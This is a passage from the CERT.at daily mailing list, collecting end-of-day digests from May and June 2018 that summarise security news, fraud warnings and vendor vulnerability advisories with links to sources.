Not following cybersecurity best practices could not only cost online users but also cost cybercriminals. Yes, sometimes hackers don't take the best security measures to keep their infrastructure safe. A variant of IoT botnet, called Owari, that relies on default or weak credentials to hack insecure IoT devices was found itself using default credentials in its MySQL server integrated with command
---------------------------------------------
https://thehackernews.com/2018/06/iot-botnet-password.html
∗∗∗ On our own behalf: CERT.at is looking for reinforcement ∗∗∗
---------------------------------------------
For our daily routine tasks we are currently looking for 1 career starter or career changer with a strong interest in IT security who will support us with the daily standard tasks. Details can be found on our jobs page. https://cert.at/about/jobs/jobs.html
---------------------------------------------
https://www.cert.at/services/blog/20180605165955-2249.html
∗∗∗ Security updates: several F-Secure AV applications are full of holes ∗∗∗
---------------------------------------------
Various F-Secure endpoint protection products for Windows contain critical security vulnerabilities.
---------------------------------------------
http://heise.de/-4068340
∗∗∗ Vulnerability Spotlight: TALOS-2018-0535 - Ocularis Recorder VMS_VA Denial of Service Vulnerability ∗∗∗
---------------------------------------------
Vulnerabilities discovered by Carlos Pacho from Talos. Overview: Talos is disclosing a denial-of-service vulnerability in the Ocularis Recorder. Ocularis is a video management software (VMS) platform used in a variety of ..
---------------------------------------------
https://blog.talosintelligence.com/2018/06/vulnerability-spotlight-talos-20…
∗∗∗ Hacking, tracking, stealing and sinking ships ∗∗∗
---------------------------------------------
At Infosecurity Europe this year, we demonstrated multiple methods to interrupt the shipping industry, several of which haven’t been demonstrated in public before, to our knowledge. Some of these issues were simply through ..
---------------------------------------------
https://www.pentestpartners.com/security-blog/hacking-tracking-stealing-and…
=====================
= Vulnerabilities =
=====================
∗∗∗ Cisco Aironet 1800, 2800, and 3800 Series Access Point Platforms ARP Request Handling Denial of Service Vulnerability ∗∗∗
---------------------------------------------
A vulnerability exists in Cisco Access Point (AP) platforms when processing Address Resolution Protocol (ARP) packets that could allow an unauthenticated, adjacent attacker to inject crafted entries into the ARP ..
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
∗∗∗ FortiSwitch rest_admin account exposed under specific conditions ∗∗∗
---------------------------------------------
During an upgrade to version 3.4.1, a FortiSwitch device may let an attacker log in to the rest_admin account without a password, if all the conditions below are met: * The FortiSwitch device ..
---------------------------------------------
http://fortiguard.com/advisory/FG-IR-16-011
=====================
= End-of-Day report =
=====================
Timeframe: Friday 01-06-2018 18:00 − Monday 04-06-2018 18:00
Handler: Alexander Riepl
Co-Handler: Stephan Richter
=====================
= News =
=====================
∗∗∗ Mobile Devs Making the Same Security Mistakes Web Devs Made in the Early 2000s ∗∗∗
---------------------------------------------
Mobile app developers are going through the same growing pains that the webdev scene went through in the 90s and 2000s, when improper input validation led to many security incidents.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/mobile-devs-making-the-same-…
∗∗∗ SMiShing with Punycode ∗∗∗
---------------------------------------------
Cybercriminals keep coming up with new ways to steal and profit from personal user data. Because mobile devices are so prevalent, and so capable, they are becoming the targets of a variety of cyberattacks that were previously limited to computers. One such attack technique is SMS phishing—SMiShing—in which attacks are delivered via text messages.
---------------------------------------------
https://www.zscaler.com/blogs/research/smishing-punycode
∗∗∗ Scammers Targeting Booking.com Users with Phishing Messages ∗∗∗
---------------------------------------------
Scammers recently targeted Booking.com customers with phishing messages designed to steal their sensitive financial information. According to The Sun, criminals sent out WhatsApp messages and text messages to customers claiming that a security breach had occurred and that recipients needed to change their passwords. The attack correspondence came with a link that, when clicked, gave [...]
---------------------------------------------
https://www.tripwire.com/state-of-security/security-data-protection/cyber-s…
∗∗∗ Warning about SEPA direct debit fraud against companies ∗∗∗
---------------------------------------------
Companies whose bank details are public are falling victim to a fraud in which criminals use their bank account for crimes. The perpetrators rely on the SEPA direct debit scheme and fake a direct debit mandate or a debit order. In other cases they give the company's bank details when making fraudulent purchases. There is a risk of a high financial loss.
---------------------------------------------
https://www.watchlist-internet.at/news/warnung-vor-sepa-lastschriftbetrug-b…
∗∗∗ Paying - Visa credit cards unusable due to hardware failure ∗∗∗
---------------------------------------------
Operations are said to be running normally again – there is no indication of a criminal attack
---------------------------------------------
https://derstandard.at/2000080869035/Visa-Kreditkarten-aufgrund-Hardware-Fe…
=====================
= Vulnerabilities =
=====================
∗∗∗ Apple Security Updates, (Sun, Jun 3rd) ∗∗∗
---------------------------------------------
Summary (MacOS, iOS, tvOS, watchOS)
---------------------------------------------
https://isc.sans.edu/diary/rss/23727
∗∗∗ Security updates for Monday ∗∗∗
---------------------------------------------
Security updates have been issued by CentOS (procps, xmlrpc, and xmlrpc3), Debian (batik, prosody, redmine, wireshark, and zookeeper), Fedora (jasper, kernel, poppler, and xmlrpc), Mageia (git and wireshark), Red Hat (rh-java-common-xmlrpc), Slackware (git), SUSE (bzr, dpdk-thunderxdpdk, and ocaml), and Ubuntu (exempi).
---------------------------------------------
https://lwn.net/Articles/756489/
∗∗∗ Jenkins plugins: multiple vulnerabilities allow, among other things, execution of arbitrary code ∗∗∗
---------------------------------------------
https://adv-archiv.dfn-cert.de/adv/2018-1064/
∗∗∗ IBM Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect IBM Security AppScan Enterprise ∗∗∗
---------------------------------------------
http://www-01.ibm.com/support/docview.wss?uid=swg22016709
=====================
= End-of-Day report =
=====================
Timeframe: Wednesday 30-05-2018 18:00 − Friday 01-06-2018 18:00
Handler: Alexander Riepl
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ May 2018 mobile malware review from Doctor Web ∗∗∗
---------------------------------------------
May 31, 2018 In May 2018 Doctor Web specialists found several Google Play applications containing the Trojan Android.Click.248.origin. It loaded fraudulent websites on which users subscribed to expensive mobile services. Also ..
---------------------------------------------
https://news.drweb.com/show/?i=12618&lng=en&c=9
∗∗∗ Shell Logins as a Magento Reinfection Vector ∗∗∗
---------------------------------------------
Recently, we have come across a number of websites that were facing reinfection of a credit card information stealer malware within the following files: app/Mage.php; lib/Varien/Autoload.php; index.php; app/code/core/Mage/Core/functions.php; These are ..
---------------------------------------------
https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vecto…
∗∗∗ Rig Exploit Kit Now Using CVE-2018-8174 to Deliver Monero Miner ∗∗∗
---------------------------------------------
An exploit kit such as Rig usually starts off with a threat actor compromising a website to inject a malicious script/code that eventually redirects would-be victims to the exploit kit’s landing page. Sometime around ..
---------------------------------------------
https://blog.trendmicro.com/trendlabs-security-intelligence/rig-exploit-kit…
∗∗∗ Expired domain led to SpamCannibals blacklist eating the whole world ∗∗∗
---------------------------------------------
The domain of the little-used SpamCannibal DNS blacklist had expired, resulting in it ..
---------------------------------------------
https://www.virusbulletin.com:443/blog/2018/05/expired-domain-led-spamcanni…
∗∗∗ Security vulnerability endangered millions of Steam client users for ten years ∗∗∗
---------------------------------------------
The Steam client was vulnerable, and attackers could have smuggled malicious code onto computers with comparatively little effort.
---------------------------------------------
http://heise.de/-4061777
∗∗∗ Browser - WebAuthn: In Chrome you can now log in without a password in many places ∗∗∗
---------------------------------------------
Fingerprint scanners or special USB sticks can be used instead
---------------------------------------------
https://derstandard.at/2000080745632/WebAuthn-Bei-Chrome-kann-man-sich-viel…
=====================
= Vulnerabilities =
=====================
∗∗∗ Cisco TelePresence TX9000 Series Cross-Frame Scripting Vulnerability ∗∗∗
---------------------------------------------
A vulnerability in the web UI of Cisco TelePresence TX9000 Series Software could allow an unauthenticated, remote attacker to conduct a cross-frame scripting (XFS) attack against a user of the web UI of the ..
---------------------------------------------
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco…
∗∗∗ Synology-SA-18:30 SSL VPN Client ∗∗∗
---------------------------------------------
A vulnerability allows remote attackers to conduct man-in-the-middle attacks via a susceptible version of SSL VPN Client.
---------------------------------------------
https://www.synology.com/en-global/support/security/Synology_SA_18_30
∗∗∗ HPESBUX03818 rev.1 - HP-UX Secure Shell, Multiple Remote Vulnerabilities ∗∗∗
---------------------------------------------
https://support.hpe.com/hpsc/doc/public/display?docLocale=en_US&docId=emr_n…
=====================
= End-of-Day report =
=====================
Timeframe: Tuesday 29-05-2018 18:00 − Wednesday 30-05-2018 18:00
Handler: Alexander Riepl
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Ultrasound attacks crash hard drives ∗∗∗
---------------------------------------------
Security researchers have used sound and ultrasound attacks to knock out video surveillance systems, but also PCs and laptops.
---------------------------------------------
https://futurezone.at/science/ultraschallangriffe-bringen-festplatten-zum-a…
∗∗∗ Yahoo hack: Canadian sentenced to five years in prison ∗∗∗
---------------------------------------------
On behalf of the Russian intelligence service, a hacker obtained access to 80 webmail accounts by breaking into the Yahoo system. Now he has to go to prison.
---------------------------------------------
http://heise.de/-4060708
∗∗∗ Robot Pepper struggles with massive security problems ∗∗∗
---------------------------------------------
Die "feindliche" Übernahme von einem Roboter ist ein Horrorszenario. Beim Service-Roboter Pepper ist das möglich, wie Wissenschaftler herausgefunden haben.
---------------------------------------------
http://heise.de/-4060743
∗∗∗ Will the Real Joker’s Stash Come Forward? ∗∗∗
---------------------------------------------
For as long as scam artists have been around so too have opportunistic thieves who specialize in ripping off other scam artists. This is the story about a group of Pakistani Web site designers who apparently have made an impressive living impersonating some of the most popular and well known "carding" markets, or online stores that sell stolen credit cards.
---------------------------------------------
https://krebsonsecurity.com/2018/05/will-the-real-jokers-stash-come-forward/
∗∗∗ 0patching Foxit Reader Buffer... Oops... Integer Overflow (CVE-2017-17557) ∗∗∗
---------------------------------------------
In April, Steven Seeley of Source Incite published a report of a vulnerability in Foxit Reader and PhantomPDF versions up to 9.0.1 that could allow for remote code execution on a target system. Public release of this report was coordinated with an official vendor fix included in the April Foxit Reader and PhantomPDF 9.1 release. According to our analysis the PoC attached to the report triggers a heap-based buffer overflow in a Bitmap image data copy operation ..
---------------------------------------------
http://blog.0patch.com/2018/05/0patching-foxit-reader-buffer-oops.html
∗∗∗ Cookie consent script used to distribute malware ∗∗∗
---------------------------------------------
Since the new website cookie usage regulations in the EU have come into force, many websites have added a warning about how they use cookies and, as well, ask for your consent.
---------------------------------------------
http://labs.sucuri.net/?note=2018-05-29
=====================
= Vulnerabilities =
=====================
∗∗∗ DSA-4212 git - security update ∗∗∗
---------------------------------------------
https://www.debian.org/security/2018/dsa-4212
∗∗∗ DSA-4213 qemu - security update ∗∗∗
---------------------------------------------
https://www.debian.org/security/2018/dsa-4213
∗∗∗ Potential XSS in "CSRF validation failure" page due to lack of referer sanitization ∗∗∗
---------------------------------------------
https://fortiguard.com/psirt/FG-IR-18-059
=====================
= End-of-Day report =
=====================
Timeframe: Monday 28-05-2018 18:00 − Tuesday 29-05-2018 18:00
Handler: Alexander Riepl
Co-Handler: Stephan Richter
=====================
= News =
=====================
∗∗∗ Cobalt Hacking Group Still Active Despite Leader's Arrest ∗∗∗
---------------------------------------------
Despite their leader's arrest in Spain two months ago, the Cobalt hacker group that's specialized in stealing money from banks and financial institutions has remained active, even launching a new campaign.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/cobalt-hacking-group-still-a…
∗∗∗ 2018 Fraud World Cup ∗∗∗
---------------------------------------------
There are only two weeks to go before the start of the massive soccer event - FIFA World Cup. This championship has already attracted the attention of millions worldwide, including a fair few cybercriminals. Long before kick-off, email accounts began bulging with soccer-related spam, and scammers started exploiting the topic in mailings and creating World Cup-themed phishing pages.
---------------------------------------------
https://securelist.com/2018-fraud-world-cup/85878/
∗∗∗ Qihoo 360 discovers high-risk security issues in EOS, says 80% digital wallets have problems ∗∗∗
---------------------------------------------
Blockchain platform EOS is facing a series of high-risk security vulnerabilities, according to Chinese cybersecurity company Qihoo 360 which published a report on May 29. The company's Vulcan team discovered that attacks can be remotely executed on the EOS node, TechNode's Chinese sister site reports.
---------------------------------------------
https://technode.com/2018/05/29/qihoo-360-security-issues-eos/
∗∗∗ New LTS Release ∗∗∗
---------------------------------------------
Back around the end of 2014 we posted our release strategy. This was the first time we defined support timelines for our releases, and added the concept of an LTS (long-term support) release. At our OMC meeting earlier this month, we picked our next LTS release. This post walks through that announcement, and tries to explain all the implications of it.
---------------------------------------------
https://www.openssl.org/blog/blog/2018/05/18/new-lts/
∗∗∗ Critical vulnerabilities in IBM's security solution QRadar ∗∗∗
---------------------------------------------
Of all things, the QRadar security solution, which is meant to detect and prevent attacks, had critical vulnerabilities that granted external attackers full access.
---------------------------------------------
http://heise.de/-4060177
∗∗∗ Do not pay 359.88 euros to MEDIA ADVICE LIMITED! ∗∗∗
---------------------------------------------
The fraudulent Media Advice Limited operates various streaming platforms such as tutoflix.de, soloflix.de or megaflix.de. Interested parties are supposed to register on the websites to get access to the film offering. Anyone who follows the instructions is in for a nasty surprise, because the registration leads to a premium membership that costs 359.88 euros per year. The amount should under no circumstances be paid, because a valid contract
---------------------------------------------
https://www.watchlist-internet.at/news/keine-35988-euro-an-media-advice-lim…
=====================
= Vulnerabilities =
=====================
∗∗∗ GNU Barcode 0.99 Memory Leak ∗∗∗
---------------------------------------------
GNU Barcode suffers from a memory leak vulnerability, which can be exploited by malicious people to cause a DoS (Denial of Service). The vulnerability is caused by an error in cmdline.c, which can be exploited to cause a memory leak via a specially crafted file. The vulnerability is confirmed in version 0.99. Other versions may also be affected.
---------------------------------------------
http://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5471.php
∗∗∗ GNU Barcode 0.99 Buffer Overflow ∗∗∗
---------------------------------------------
The vulnerability is caused due to a boundary error in the processing of an input file, which can be exploited to cause a buffer overflow when a user processes e.g. a specially crafted file. Successful exploitation could allow execution of arbitrary code on the affected machine.
---------------------------------------------
http://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5470.php
∗∗∗ Security updates for Tuesday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (wireshark), Fedora (kernel), openSUSE (enigmail), Red Hat (kernel), SUSE (cairo, java-1_7_0-ibm, libvirt, perl-DBD-mysql, and xen), and Ubuntu (batik and isc-dhcp).
---------------------------------------------
https://lwn.net/Articles/755884/
∗∗∗ WordPress plugin "Site Reviews" vulnerable to cross-site scripting ∗∗∗
---------------------------------------------
https://jvn.jp/en/jp/JVN60978548/
∗∗∗ WordPress plugin "Email Subscribers & Newsletters" vulnerable to cross-site scripting ∗∗∗
---------------------------------------------
https://jvn.jp/en/jp/JVN16471686/
∗∗∗ IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect Content Collector for SAP Applications ∗∗∗
---------------------------------------------
https://www-01.ibm.com/support/docview.wss?uid=swg22014445
∗∗∗ IBM Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect IBM Integration Bus and WebSphere Message Broker ∗∗∗
---------------------------------------------
http://www-01.ibm.com/support/docview.wss?uid=swg22016387
∗∗∗ Unprotected WiFi access & Unencrypted data transfer in Vgate iCar2 OBD2 Dongle ∗∗∗
---------------------------------------------
https://www.sec-consult.com/en/blog/advisories/unprotected-wifi-access-unen…
∗∗∗ Spring Framework vulnerability CVE-2018-1258 ∗∗∗
---------------------------------------------
https://support.f5.com/csp/article/K18193959
∗∗∗ HPESBHF03852 rev.1 - HPE Intelligent Management Center (iMC) Wireless Service Manager (WSM) Software, Remote Code Execution ∗∗∗
---------------------------------------------
https://support.hpe.com/hpsc/doc/public/display?docLocale=en_US&docId=emr_n…
=====================
= End-of-Day report =
=====================
Timeframe: Friday 25-05-2018 18:00 − Monday 28-05-2018 18:00
Handler: Alexander Riepl
Co-Handler: Stephan Richter
=====================
= News =
=====================
∗∗∗ Capture and Analysis of User Agents, (Sun, May 27th) ∗∗∗
---------------------------------------------
ISC collects web logs which also include User-Agents. If you are running a honeypot or a web server, it is fairly easy to quickly use some Regex to parse the logs and get a count of what is most commonly seen. This is some of the activity I have observed over the past week, some well-known user agents associated with valid browser versions and some custom ones that are telltale signs of hacking tools: [...]
---------------------------------------------
https://isc.sans.edu/diary/rss/23705
∗∗∗ NCSC-NL/taranis3 ∗∗∗
---------------------------------------------
NCSC-NL has published their internal workflow management tool "Taranis" on GitHub. This makes it easier for the community to contribute to future developments.
---------------------------------------------
https://github.com/NCSC-NL/taranis3/
∗∗∗ VPNFilter botnet: US authorities urgently advise restarting routers and NAS devices ∗∗∗
---------------------------------------------
Because important parts of the VPNFilter botnet's infrastructure have been seized, a restart can defuse the infection. The FBI and the US Department of Justice therefore advise restarting SOHO routers and NAS devices.
---------------------------------------------
https://www.heise.de/-4059341
∗∗∗ Efail: Recommended workaround for Apple Mail and PGP apparently does not protect ∗∗∗
---------------------------------------------
According to a report, Apple's email client with GPG Suite can still leak encrypted mails even if the user has disabled loading of remote content. Display of HTML mails cannot be completely switched off in Apple Mail.
---------------------------------------------
http://heise.de/-4059867
∗∗∗ Attackers Fake Computational Power to Steal CryptoCurrencies from Mining Pools ∗∗∗
---------------------------------------------
Recently, we detected a new type of attack which targets some equihash mining pools. After analysis, we found out the attacked equihash mining pools are [...]
---------------------------------------------
https://blog.360totalsecurity.com/en/attackers-fake-computational-power-ste…
∗∗∗ Warning about mmg-tennis.de ∗∗∗
---------------------------------------------
In the web store mmg-tennis.de consumers find cheap branded goods. These are counterfeit products. Customers who buy at mmg-tennis.de must therefore expect numerous disadvantages and excessive debits from their accounts. We therefore strongly advise against buying at mmg-tennis.de.
---------------------------------------------
https://www.watchlist-internet.at/news/warnung-vor-mmg-tennisde/
=====================
= Vulnerabilities =
=====================
∗∗∗ 2018-1014: Moodle: Multiple vulnerabilities allow, among other things, execution of arbitrary code ∗∗∗
---------------------------------------------
A vulnerability in Moodle allows a remote, simply authenticated attacker with the permission to create calculated questions to execute arbitrary code ( https://moodle.org/mod/forum/discuss.php?d=371199#p1496353 ). Multiple further vulnerabilities [...]
---------------------------------------------
https://adv-archiv.dfn-cert.de/adv/2018-1014/
∗∗∗ Security updates for Monday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (batik, cups, gitlab, ming, and xdg-utils), Fedora (dpdk, firefox, glibc, nodejs-deep-extend, strongswan, thunderbird, thunderbird-enigmail, wavpack, xdg-utils, and xen), Gentoo (ntp, rkhunter, and zsh), openSUSE (Chromium, GraphicsMagick, jasper, opencv, pdns, and wireshark), SUSE (jasper, java-1_7_1-ibm, krb5, libmodplug, and openstack-nova), and Ubuntu (thunderbird).
---------------------------------------------
https://lwn.net/Articles/755796/
∗∗∗ IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Tivoli Netcool Impact ∗∗∗
---------------------------------------------
http://www-01.ibm.com/support/docview.wss?uid=swg22016544
∗∗∗ IBM Security Bulletin: Security Bulletin: IBM Cloud Orchestrator and Cloud Orchestrator Enterprise update of IBM® SDK Java™ Technology Edition and IBM® Runtime Environment Java™ ∗∗∗
---------------------------------------------
http://www.ibm.com/support/docview.wss?uid=swg2C1000370
--
CERT.at Daily mailing list
Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily
=====================
= End-of-Day report =
=====================
Timeframe: Thursday 24-05-2018 18:00 − Friday 25-05-2018 18:00
Handler: Robert Waldner
Co-Handler: Stephan Richter
=====================
= News =
=====================
∗∗∗ Z-Shave Attack Could Impact Over 100 Million IoT Devices ∗∗∗
---------------------------------------------
The Z-Wave wireless communications protocol used for some IoT/smart devices is vulnerable to a downgrade attack that can allow a malicious party to intercept and tamper with traffic between smart devices.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/z-shave-attack-could-impact-…
∗∗∗ Electron: What the patch of the patch is about... ∗∗∗
---------------------------------------------
Last week the Electron developers released a patch for the January patch of their cross-platform framework for building desktop apps. A security researcher at Doyensec has now explained why that was necessary.
---------------------------------------------
https://www.heise.de/-4058755
∗∗∗ Fake transfer order sent to club treasurers ∗∗∗
---------------------------------------------
Club treasurers receive a purported message from their club chairperson stating that the club urgently needs to transfer money abroad. If they comply, the club loses the money, because the message comes from criminals.
---------------------------------------------
https://www.watchlist-internet.at/news/gefaelschter-ueberweisungsauftrag-fu…
=====================
= Vulnerabilities =
=====================
∗∗∗ VU#338343: strongSwan VPN charon server vulnerable to buffer underflow ∗∗∗
---------------------------------------------
[...] strongSwan VPNs charon server prior to version 5.6.3 does not check packet length and may allow buffer underflow, resulting in denial of service.
---------------------------------------------
http://www.kb.cert.org/vuls/id/338343
∗∗∗ BeaconMedaes TotalAlert Scroll Medical Air Systems ∗∗∗
---------------------------------------------
This medical device advisory includes mitigations for improper access controls, insufficiently protected credentials, and unprotected storage of credentials vulnerabilities in the BeaconMedaes TotalAlert Scroll Medical Air Systems web application.
---------------------------------------------
https://ics-cert.us-cert.gov/advisories/ICSMA-18-144-01
∗∗∗ Schneider Electric Floating License Manager ∗∗∗
---------------------------------------------
This advisory includes mitigations for heap-based buffer overflow, improper restriction of operations within the bounds of a memory buffer, and open redirect vulnerabilities in the Schneider Electric Floating License Manager.
---------------------------------------------
https://ics-cert.us-cert.gov/advisories/ICSA-18-144-01
∗∗∗ Security updates for Friday ∗∗∗
---------------------------------------------
Security updates have been issued by Arch Linux (bind, libofx, and thunderbird), Debian (thunderbird, xdg-utils, and xen), Fedora (procps-ng), Mageia (gnupg2, mbedtls, pdns, and pdns-recursor), openSUSE (bash, GraphicsMagick, icu, and kernel), Oracle (thunderbird), Red Hat (java-1.7.1-ibm, java-1.8.0-ibm, and thunderbird), Scientific Linux (thunderbird), and Ubuntu (curl).
---------------------------------------------
https://lwn.net/Articles/755667/
∗∗∗ IBM Security Bulletin: IBM Security Guardium Big Data Intelligence (SonarG) is affected by an Application Error vulnerability ∗∗∗
---------------------------------------------
http://www-01.ibm.com/support/docview.wss?uid=swg22016515
∗∗∗ IBM Security Bulletin: IBM Security Guardium Big Data Intelligence (SonarG) is affected by an Incorrect Permission Assignment for Critical Resource vulnerability ∗∗∗
---------------------------------------------
http://www-01.ibm.com/support/docview.wss?uid=swg22016132
∗∗∗ IBM Security Bulletin: IBM Security Guardium Big Data Intelligence (SonarG) is affected by a Query Parameter in SSL Request vulnerability ∗∗∗
---------------------------------------------
http://www-01.ibm.com/support/docview.wss?uid=swg22016131
∗∗∗ IBM Security Bulletin: IBM Spectrum Control (formerly IBM Tivoli Storage Productivity Center) is affected by a vulnerability in Apache CXF (CVE-2017-12624) ∗∗∗
---------------------------------------------
http://www.ibm.com/support/docview.wss?uid=swg22014053
∗∗∗ IBM Security Bulletin: Open Source Apache CXF Vulnerabilities affects IBM Spectrum LSF Explorer ∗∗∗
---------------------------------------------
http://www-01.ibm.com/support/docview.wss?uid=isg3T1027368
∗∗∗ IBM Security Bulletin: API Connect Developer Portal is affected by a PHP vulnerability (CVE-2017-7272) ∗∗∗
---------------------------------------------
http://www-01.ibm.com/support/docview.wss?uid=swg22016607
∗∗∗ IBM Security Bulletin: IBM Spectrum Control (formerly IBM Tivoli Storage Productivity Center) is affected by an OpenSSL vulnerability (CVE-2018-0739) ∗∗∗
---------------------------------------------
http://www.ibm.com/support/docview.wss?uid=swg22015614
∗∗∗ IBM Security Bulletin: IBM FileNet Image Services is affected by GSKit and GSKit-Crypto vulnerabilities ∗∗∗
---------------------------------------------
https://www-01.ibm.com/support/docview.wss?uid=swg22014741
∗∗∗ IBM Security Bulletin: Vulnerability in IBM WebSphere Application Server affects IBM Spectrum Control (formerly Tivoli Storage Productivity Center) CVE-2017-1788 ∗∗∗
---------------------------------------------
http://www.ibm.com/support/docview.wss?uid=swg22014729
∗∗∗ IBM Security Bulletin: IBM Security Guardium Big Data Intelligence (SonarG) is affected by a Cross-Site Scripting vulnerability ∗∗∗
---------------------------------------------
http://www-01.ibm.com/support/docview.wss?uid=swg22016512
∗∗∗ IBM Security Bulletin: IBM Security Guardium Big Data Intelligence (SonarG) is affected by a Session Identifier Not Updated vulnerability ∗∗∗
---------------------------------------------
http://www-01.ibm.com/support/docview.wss?uid=swg22016513
=====================
= End-of-Day report =
=====================
Timeframe: Wednesday 23-05-2018 18:00 − Thursday 24-05-2018 18:00
Handler: Robert Waldner
Co-Handler: Stephan Richter
=====================
= News =
=====================
=====================
= Vulnerabilities =
=====================
∗∗∗ Schneider Electric Patches XXE Vulnerability In Software ∗∗∗
---------------------------------------------
Schneider Electric on Tuesday issued fixes for a vulnerability in its SoMachine Basic software that could result in disclosure and retrieval of arbitrary data.
---------------------------------------------
https://threatpost.com/schneider-electric-patches-xxe-vulnerability-in-plcs…
∗∗∗ Bugtraq: [security bulletin] MFSBGN03808 rev.1 - Micro Focus UCMDB, Cross-Site Scripting ∗∗∗
---------------------------------------------
A potential security vulnerability has been identified in Micro Focus Universal CMDB/CMS and Micro Focus UCMDB Browser. The vulnerability could be remotely exploited to allow Cross-Site Scripting (XSS).
References: CVE-2018-6495 - Cross-Site Scripting (XSS)
---------------------------------------------
http://www.securityfocus.com/archive/1/542037
∗∗∗ Vuln: Apache Batik CVE-2018-8013 Information Disclosure Vulnerability ∗∗∗
---------------------------------------------
Apache Batik is prone to an information-disclosure vulnerability. An attacker can exploit this issue to gain access to sensitive information; this may lead to further attacks. Apache Batik 1.9.1 and prior versions are vulnerable.
---------------------------------------------
http://www.securityfocus.com/bid/104252
∗∗∗ Security updates for Thursday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (imagemagick), Fedora (curl, glibc, kernel, and thunderbird-enigmail), openSUSE (enigmail, knot, and python), Oracle (procps-ng), Red Hat (librelp, procps-ng, redhat-virtualization-host, rhev-hypervisor7, and unboundid-ldapsdk), Scientific Linux (procps-ng), SUSE (bash, ceph, icu, kvm, and qemu), and Ubuntu (procps and spice, spice-protocol).
---------------------------------------------
https://lwn.net/Articles/755540/
∗∗∗ IBM Security Bulletin: IBM i has released PTFs in response to the vulnerabilities known as Spectre and Meltdown. ∗∗∗
---------------------------------------------
http://www-01.ibm.com/support/docview.wss?uid=nas8N1022433&myns=ibmi&mynp=O…
∗∗∗ IBM Security Bulletin: IBM has released the following fixes for AIX and VIOS in response to Speculative Store Bypass (SSB), also known as Variant 4. ∗∗∗
---------------------------------------------
http://www-01.ibm.com/support/docview.wss?uid=isg3T1027700
∗∗∗ IBM Security Bulletin: IBM Integrated Management Module II (IMM2) is affected by vulnerability in OpenSLP (CVE-2017-17833) ∗∗∗
---------------------------------------------
https://www.ibm.com/support/home/docdisplay?lndocid=migr-5099807
∗∗∗ IBM Security Bulletin: IBM Integrated Management Module (IMM) is affected by vulnerability in OpenSLP (CVE-2017-17833) ∗∗∗
---------------------------------------------
https://www.ibm.com/support/home/docdisplay?lndocid=migr-5099806
∗∗∗ IBM Security Bulletin: Multiple vulnerabilities affect db2exmig and db2exfmt tools shipped with IBM® Db2® (CVE-2018-1544, CVE-2018-1565) ∗∗∗
---------------------------------------------
http://www.ibm.com/support/docview.wss?uid=swg22016143
∗∗∗ IBM Security Bulletin: Buffer overflow in the db2convert tool shipped with IBM® Db2® (CVE-2018-1515). ∗∗∗
---------------------------------------------
http://www.ibm.com/support/docview.wss?uid=swg22016140
∗∗∗ IBM Security Bulletin: Buffer overflow in IBM® Db2® tool db2licm (CVE-2018-1488). ∗∗∗
---------------------------------------------
http://www.ibm.com/support/docview.wss?uid=swg22016141
∗∗∗ IBM Security Bulletin: IBM® Db2® is vulnerable to buffer overflow (CVE-2018-1459). ∗∗∗
---------------------------------------------
http://www.ibm.com/support/docview.wss?uid=swg22016142
∗∗∗ IBM Security Bulletin: IBM® Db2® is affected by multiple file overwrite vulnerabilities (CVE-2018-1450, CVE-2018-1449, CVE-2018-1451, CVE-2018-1452) ∗∗∗
---------------------------------------------
http://www.ibm.com/support/docview.wss?uid=swg22016181
∗∗∗ IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK and IBM Java Runtime affect IBM® Db2®. ∗∗∗
---------------------------------------------
http://www.ibm.com/support/docview.wss?uid=swg22015656
∗∗∗ IBM Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect IBM MQ ∗∗∗
---------------------------------------------
http://www-01.ibm.com/support/docview.wss?uid=swg22016278
∗∗∗ IBM Security Bulletin: IBM NeXtScale Fan Power Controller (FPC) is affected by OpenSLP vulnerability (CVE-2017-17833) ∗∗∗
---------------------------------------------
https://www.ibm.com/support/home/docdisplay?lndocid=MIGR-5099809
∗∗∗ IBM Security Bulletin: IBM Chassis Management Module (CMM) is affected by OpenSLP vulnerability (CVE-2017-17833) ∗∗∗
---------------------------------------------
https://www.ibm.com/support/home/docdisplay?lndocid=MIGR-5099808
∗∗∗ IBM Security Bulletin: Multiple Vulnerabilities in IBM® Java SDK affects WebSphere Application Server April 2018 CPU ∗∗∗
---------------------------------------------
http://www-01.ibm.com/support/docview.wss?uid=swg22016282
=====================
= End-of-Day report =
=====================
Timeframe: Tuesday 22-05-2018 18:00 − Wednesday 23-05-2018 18:00
Handler: Robert Waldner
Co-Handler: Stephan Richter
=====================
= News =
=====================
∗∗∗ Backdoor Account Found in D-Link DIR-620 Routers ∗∗∗
---------------------------------------------
Security researchers have found a backdoor account in the firmware of D-Link DIR-620 routers that allows hackers to take over any device reachable via the Internet.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/backdoor-account-found-in-d-…
∗∗∗ Six Vulnerabilities Found in Dell EMC's Disaster Recovery System, One Critical ∗∗∗
---------------------------------------------
A pen-tester has found five vulnerabilities in Dell EMC RecoverPoint devices, including a critical RCE that could allow total system compromise.
---------------------------------------------
https://threatpost.com/six-vulnerabilities-found-in-dell-emcs-disaster-reco…
∗∗∗ VPNFilter – is a malware timebomb lurking on your router? ∗∗∗
---------------------------------------------
A Cisco paper reports on zombie malware that has apparently infected more than 500,000 home routers.
---------------------------------------------
https://nakedsecurity.sophos.com/2018/05/23/vpnfilter-is-a-malware-timebomb…
∗∗∗ An Old Trick with a New Twist: Cryptomining Through Disguised URL Shorteners ∗∗∗
---------------------------------------------
